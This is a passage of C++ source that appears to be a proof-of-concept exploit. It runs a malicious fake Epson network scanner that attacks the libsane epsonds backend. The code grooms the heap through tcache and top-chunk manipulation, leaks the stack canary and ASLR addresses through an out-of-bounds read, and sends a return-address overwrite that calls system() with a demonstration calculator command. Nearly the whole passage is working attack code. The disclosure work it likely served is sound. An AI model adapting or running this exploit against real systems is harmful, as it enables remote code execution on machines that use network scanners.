            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };

          const uint32_t more = 0xa30;
          // Include a PRD to plug the hole from the previous iteration.
          sprintf(&reply[17], "%07x#iter%lu#PRDha2f#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_create_extra_tcache_block;
          return 20;
        } else if (i % 3 == 1) {
          char reply[76] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };

          const uint32_t more = 0x510;
          sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_reindex_extra_tcache_block;
          return 20;
        } else {
          char reply[76] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };

          const uint32_t more = 0x510;
          sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_resize_extra_tcache_block;
          return 20;
        }
      } else if (acceptCount_ == A_large_mmap) {
        printf("A_large_mmap %lu\n", acceptCount_);
        // Do a large allocation which does not get leaked to ensure
        // that sufficient memory has been mmap-ed. Otherwise our top-chunk
        // shenanigans could hit invalid memory and trigger a SIGSEGV.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        const uint32_t more = large_mmap_size;
        // Use a PRD to plug the hole from the previous iteration.
        sprintf(
          &reply[17], "%07x#iter%lu#PRDha2f#---", more, acceptCount_
        );
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_large_mmap;
        return 20;
      } else if (acceptCount_ == A_create_barrier1) {
        printf("A_create_barrier1 %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Allocate 0xa30 bytes into `pbuf`. We will leak a block above it
        // in memory so that when `pbuf` is freed, it leaves a gap in
        // memory which is exactly big enough for two allocations of size
        // 0x510.
        const uint32_t more = 0xa30;
        sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_create_barrier;
        return 20;
      } else if (acceptCount_ == A_resize_buffer1) {
        printf("A_resize_buffer1 %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Half the size of the previous iteration, so that both `pbuf` and
        // `s->netbuf` fit in the gap before the barrier.
        const uint32_t more = 0x510;
        // We used the PRD command to allocate a large buffer in
        // decode_buffer which is too big to fit before the barrier.
        sprintf(&reply[17], "%07x#PRDha5fkevwozere#---", more);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_resize_buffer;
        return 20;
      } else if (acceptCount_ == A_overwrite_top) {
        printf("A_overwrite_top %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Allocate the same size as the previous iteration so that `pbuf`
        // and `s->netbuf` fit in the gap before the barrier. We also allocate
        // a large PRD. It is too big to fit in the gap reserved for
        // `pbuf` and `s->netbuf` so it goes in the gap that we created in
        // `send_resize_buffer`, which overlaps with the top chunk.
        // The PRD command is carefully positioned (with the AAAAAA padding)
        // So that a stack address will overwrite the size of the top chunk.
        const uint32_t more = 0x510;
        sprintf(
          &reply[17],
          "%07x#AAAAAAAAAAAAAAAAAA#PRDha3fkevwozere#---",
          more
        );
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        // When we use the size of the top chunk to do arithmetic, we can
        // only subtract multiples of 0x10. So we have deliberately written
        // the stack address one byte higher in memory. For example, if the
        // stack address is 0x00007fffcb65c760, then we have overwritten
        // the size of the top chunk with 0x007fffcb65c76000. The bottom
        // byte of the top chunk needs to be 0x5, so the next step is to
        // use a buffer overflow to overwrite the bottom byte.
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_overwrite_top;
        return 20;
      } else if (acceptCount_ == A_subtract_top) {
        printf("A_subtract_top %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Allocate a huge buffer to subtract the desired amount from the
        // size of the top chunk. This is based on the following calculation:
        //
        // 1. We originally grabbed an stack address like 0x7f2641913760
        // 2. The target stack address is 0x7f2641913588
        // 3. But the second exploit needs to aim 0x10 bytes below the target
        //    stack address, so the target is actually 0x7f2641913578.
        // 4. So we want to subtract 0x1e8 from the original stack address.
        // 5. We have shifted the address left by 1 byte, so we actually need
        //    to allocate 0x1e800 bytes to get the desired effect.
        // 6. At this point of the exploit, we have already allocated 0xb3e0
        //    bytes, so there are 0x13420 left to allocate.
        // 7. On this iteration we're going to plug the hole left by the previous
        //    stage (0xb00) and start the process of allocating more memory


        // Now we're going to do a large allocation to subtract the number that
        // we want from the size of the top chunk.
        //

        const uint32_t more = 0x10980;
        // Use a PRD to plug the remaining hole
        sprintf(&reply[17], "%07x#iter%lu#PRDh50fkevwozere#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_subtract_top;
        return 20;
      } else if (acceptCount_ == A_copy_pointer) {
        printf(
          "A_copy_pointer %lu  count=%lu\n",
          acceptCount_, copy_pointer_info_count_
        );
        // We trigger the pointer copy on the first visit.  On the second
        // visit, we are just going around the esci2_info an extra time
        // because we need to leak some 64 byte blocks from the tcache.
        copy_pointer_info_count_++;
        if (copy_pointer_info_count_ == 1) {
          char reply[76] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };

          // We just put made an allocation of size 0x400 immediately before
          // the top chunk, and it is now in the tcache. So pbuf will get
          // that allocation and will be able to use a PRD command to read the
          // size of the top chunk.
          const uint32_t more = 0x400;
          // Use a PRD to plug the remaining hole
          sprintf(&reply[17], "%07x#iter%lu#PRDh50fkevwozere#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_copy_pointer;
          return 20;
        } else if (copy_pointer_info_count_ == 2) {
          char reply[75] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };
          const uint32_t more = 0;
          sprintf(&reply[17], "%07x#iter%lu#nrdBUSY#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_hdr;
          return 12;
        } else if (copy_pointer_info_count_ == 3) {
          char reply[75] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };
          const uint32_t more = 64;
          sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_leakmem64_nrdBUSY;
          return 20;
        } else {
          char reply[75] =
            {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
             'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
             0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
            };
          const uint32_t more = 64;
          sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
          if (sock.reply(reply, sizeof(reply)) < 0) {
            printf("send failed.\n");
          }
          state_ = H_wait_moreinfo;
          moreinfo_state_ = M_leakmem64;
          return 20;
        }
      } else {
        // Out of bounds read in decode_binary (epsonds-cmd.c:273)
        // This will read 0xFFF bytes from the stack and copy it into
        // a malloc-ed buffer.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        const uint32_t more = 0;
        sprintf(
          &reply[17],
          "%07x#FB AREAi0000850i0001400#VERhfffkevwozere#---", more);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_hdr;
        return 12;
      }
    } else if (buf_size_ == 12 && memcmp(buf, "CAPAx0000000", 12) == 0 && reply_len_ == 64) {
      if (acceptCount_ == A_copy_pointer) {
        // This stage of the exploit is special. We need to deliberately
        // allocate and leak 64 byte allocations, because we need to exhaust
        // the 64 allocations in the tcache. So we send back a reply that is
        // too short and then follow it with a "more" reply that does the same.
        char reply[75] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
           'C','A','P','A','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        const uint32_t more = 0;
        sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        // We just triggered the info leak exploit. We're going to receive a huge
        // dump of the program's memory. We only request the first 4K though,
        // because that will hopefully be enough to deduce all the ASLR offsets
        // that we need.
        state_ = H_wait_hdr;
        return 12;
      } else {
        // Send back an invalid response so that we disconnect cleanly
        // without leaking the 64 byte reply buffer that was allocated in
        // `epsonds_net_write`.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'C','A','P','A','y',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }

        state_ = H_wait_hdr;
        return 12;
      }
    } else if (buf_size_ == 12 && memcmp(buf, "FIN x0000000", 12) == 0 && reply_len_ == 64) {
      char reply[76] =
        {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
         'F','I','N',' ','x',0,0,0,0,0,0,0,0,0,0,0,
         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
         0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
        };
      const uint32_t more = 0;
      sprintf(&reply[17], "%07x#---", more);
      if (sock.reply(reply, sizeof(reply)) < 0) {
        printf("send failed.\n");
      }

      state_ = H_wait_hdr;
      return 12;
    } else {
      printf(
        "eds_send unrecognized command: %s\nbuf_size=%u reply_len=%u\n",
        buf, buf_size_, reply_len_);
      return -1;
    }
  }

  ssize_t net_lock(SocketHandlerTCP& sock, const uint8_t* buf) {
    printf("net_lock\n");
    if (buf_size_ != 7) {
      printf("net_lock unexpected buf_size: %u\n", buf_size_);
      return -1;
    }
    if (memcmp(buf, "\x01\xa0\x04\x00\x00\x01\x2c", 7) != 0) {
      printf("net_lock unexpected payload\n");
      return -1;
    }
    return send_ack(sock);
  }

  void read_stackdump(SocketHandlerTCP& sock, const uint8_t* buf) {
    printf("read_stackdump\n");
    printf("cmd: %x\n", cmd_);
    printf("buf_size: %x\n", buf_size_);
    printf("reply_len: %x\n", reply_len_);
    printf("payload: %s\n", buf);

    const uint64_t canary = *(const uint64_t*)&buf[0x48];
    printf("stack canary: %lx\n", canary);

    const uint64_t stackaddr = *(const uint64_t*)&buf[0x60] - 0x230;
    printf("stack addr: %lx\n", stackaddr);
    const uint64_t returnaddr = *(const uint64_t*)&buf[0x88];
    printf("return addr: %lx\n", returnaddr);
    const uint64_t systemaddr = returnaddr - 0x9ecc;
    printf("system addr: %lx\n", systemaddr);

    for (size_t i = 0; i < 0x100; i += 2*sizeof(uint64_t)) {
      const uint64_t* p = (const uint64_t*)&buf[i];
      printf("%.16lx: %.16lx %.16lx\n", i, p[0], p[1]);
    }

    const uint32_t len = 0x100;
    char header[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};

    // The code will crash if it tries to free the buffer (epsonds-net.c:143), so we
    // bypass that by sending fewer bytes than it expects. That's we write len+1
    // into the header.
    *(uint32_t*)&header[6] = htonl(len+1);

    char reply[sizeof(header) + len];
    memset(reply, 0, sizeof(reply));
    memcpy(reply, header, sizeof(header));

    char* payload = &reply[sizeof(header)];
    *(uint64_t*)&payload[0x0] = canary;
    *(uint64_t*)&payload[0x10] = 0x100; // rbx
    *(uint64_t*)&payload[0x18] = stackaddr + 0x44; // rbp
    *(uint64_t*)&payload[0x20] = systemaddr; // r12
    *(uint64_t*)&payload[0x28] = 0x1300; // r13
    *(uint64_t*)&payload[0x30] = stackaddr + 0x78; // r14
    *(uint64_t*)&payload[0x38] = 0x1500; // r15
    *(uint64_t*)&payload[0x40] = returnaddr + 0x25db; // return addr
    sprintf(&payload[0x50], "gnome-calculator -e 1337");

    const ssize_t wr = sock.reply(reply, sizeof(reply));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

public:
  explicit EpsonHandlerTCP(size_t acceptCount) :
    acceptCount_(acceptCount),
    copy_pointer_info_count_(0),
    state_(H_wait_hdr),
    moreinfo_state_(M_leakmem),
    cmd_(0),
    buf_size_(0),
    reply_len_(0)
  {}

  ssize_t accept(SocketHandlerTCP& sock) override {
    printf("Sending welcome message.\n");

    // Send back a welcome message. To hit the code in epson2.c, the
    // payload needs to be 5 bytes; to the hit the code in epsonds.c, it
    // needs to be 3 bytes.
    const char reply[15] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 3, 0, 0, 'K','E','V'};
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    state_ = H_wait_hdr;
    return 12;
  }

  ssize_t receive(SocketHandlerTCP& sock, const uint8_t* buf) override {
    switch (state_) {
    case H_wait_hdr:
      // Parse the header. (First 12 bytes.)
      if (buf[0] != 'I' || buf[1] != 'S' || buf[4] != 0 || buf[5] != 12) {
        printf("EPSON message has malformed header.");
        return -1;
      }

      cmd_ = (((uint16_t)buf[2]) << 8) | buf[3];
      if ((cmd_ & 0xFF00) == 0x2000) {
        // There will be an extended header.
        state_ = H_wait_extra_hdr;
        return 8;
      }
      if (cmd_ == 0x2101) {
        // epsonds_net_unlock
        // That was the final message, so stop reading from the socket.
        return 0;
      }
      buf_size_ = ntohl(*(const uint32_t*)&buf[6]);
      if (buf_size_ > 0x10000) {
        printf("unexpectedly large buf_size_: %u\n", buf_size_);
        return -1;
      }
      reply_len_ = 0;
      state_ = H_wait_payload;
      return buf_size_;

    case H_wait_extra_hdr:
      buf_size_ = ntohl(*(const uint32_t*)&buf[0]);
      reply_len_ = ntohl(*(const uint32_t*)&buf[4]);
      if (acceptCount_ == A_copy_pointer && buf_size_ >= 0x1000) {
        printf("wait for stack dump\n");
        state_ = H_wait_stackdump;
        return 0x100 + 13;
      }
      state_ = H_wait_payload;
      return buf_size_;

    case H_wait_moreinfo:
      // This case is triggered if we specified a non-zero "more" value in
      // the initial reply.

      // Parse the header. (First 12 bytes.)
      if (buf[0] != 'I' || buf[1] != 'S' || buf[4] != 0 || buf[5] != 12) {
        printf("EPSON message has malformed header.");
        return -1;
      }

      cmd_ = (((uint16_t)buf[2]) << 8) | buf[3];
      buf_size_ = ntohl(*(const uint32_t*)&buf[6]);
      printf("more INFO: %x %x\n", cmd_, buf_size_);
      buf_size_ = ntohl(*(const uint32_t*)&buf[12]);
      reply_len_ = ntohl(*(const uint32_t*)&buf[16]);
      printf("more INFO extra: %x %x\n", buf_size_, reply_len_);

      switch (moreinfo_state_) {
      case M_leakmem:
        send_leakmem(sock);
        break;
      case M_create_tcache_blocks:
        send_create_tcache_blocks(sock);
        break;
      case M_reindex_tcache_blocks:
        send_reindex_tcache_blocks(sock);
        break;
      case M_overwrite_tcache_blocks:
        send_overwrite_tcache_blocks(sock);
        break;
      case M_create_extra_tcache_block:
        send_create_extra_tcache_block(sock);
        break;
      case M_reindex_extra_tcache_block:
        send_reindex_extra_tcache_block(sock);
        break;
      case M_resize_extra_tcache_block:
        send_resize_extra_tcache_block(sock);
        break;
      case M_large_mmap:
        send_mmap(sock);
        break;
      case M_create_barrier:
        send_create_barrier(sock);
        break;
      case M_resize_buffer:
        send_resize_buffer(sock);
        break;
      case M_overwrite_top:
        send_overwrite_top(sock);
        break;
      case M_subtract_top:
        send_subtract_top(sock);
        break;
      case M_copy_pointer:
        send_copy_pointer(sock);
        break;
      case M_leakmem64:
        send_leakmem64(sock);
        break;
      case M_leakmem64_nrdBUSY:
        send_leakmem64_nrdBUSY(sock);
        break;
      default:
        printf("Invalid EPSON moreinfo header state: %d\n", moreinfo_state_);
        return -1;
      }
      state_ = H_wait_hdr;
      return 12;

    case H_wait_payload:
      switch (cmd_) {
      case 0x2000: // eds_send
        return eds_send(sock, buf);
      case 0x2100: // net_lock
        return net_lock(sock, buf);
      default:
        printf("Unknown EPSON command: 0x%x\n", cmd_);
        return -1;
      }

    case H_wait_stackdump:
      // fingers crossed!
      read_stackdump(sock, buf + 13);
      return 0;

    default:
      printf("Invalid EPSON header state: %d\n", state_);
      return -1;
    }
  }

  void disconnect() override {}
};

class BuildEpsonHandlerTCP : public BuildRecvHandlerTCP {
  EpsonClientSet& epsonClientSet_;

  TCP_Cache cache_[EpsonHandlerTCP::A_copy_pointer];

public:
  explicit BuildEpsonHandlerTCP(EpsonClientSet& epsonClientSet) :
    epsonClientSet_(epsonClientSet)
  {}

  RecvHandlerTCP* build(
    sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    const size_t acceptCount =
      epsonClientSet_.incrClient(peer_addr, peer_addr_len);

    // All of the stages except the final stage send the exact same
    // sequence of bytes every time. During the first run, we cache the
    // payload so that subsequent runs can use the cache. The conversation
    // between libsane and the fake scanner involves a lot of very short
    // messages going back forth and there is a small delay every time. The
    // caching makes the exploit run approximate 3x faster by sending all
    // those short messages in a single batch so that libsane doesn't have
    // to wait for the next message to arrive.
    if (acceptCount < EpsonHandlerTCP::A_copy_pointer) {
      TCP_Cache& cacheRef = cache_[acceptCount];
      if (cacheRef.isInitialized()) {
        return new TCP_Cache_Playback(cacheRef);
      } else {
        return new TCP_Cache_Record(
          new EpsonHandlerTCP(acceptCount), cacheRef
        );
      }
    } else {
      return new EpsonHandlerTCP(acceptCount);
    }
  }
};

int main() {
  const int epollfd = epoll_create1(0);
  if (epollfd == -1) {
    fprintf(stderr, "Call to epoll_create1 failed.\n");
    exit(EXIT_FAILURE);
  }

  EpsonClientSet epsonClientSet;

  if (EpollRecvHandlerUDP::build(
        epollfd,
        create_and_bind_udp(3289),
        new EpsonHandlerUDP(epsonClientSet)) < 0) {
    fprintf(stderr, "Failed to bind UDP port 3289.\n");
    exit(EXIT_FAILURE);
  }

  if (EpollTcpConnectHandler::build(
        epollfd,
        create_bind_and_listen_tcp(1865),
        new BuildEpsonHandlerTCP(epsonClientSet)) < 0) {
    fprintf(stderr, "Failed to bind UDP port 1865.\n");
    exit(EXIT_FAILURE);
  }

  epoll_main_loop(epollfd);

  return 0;
}
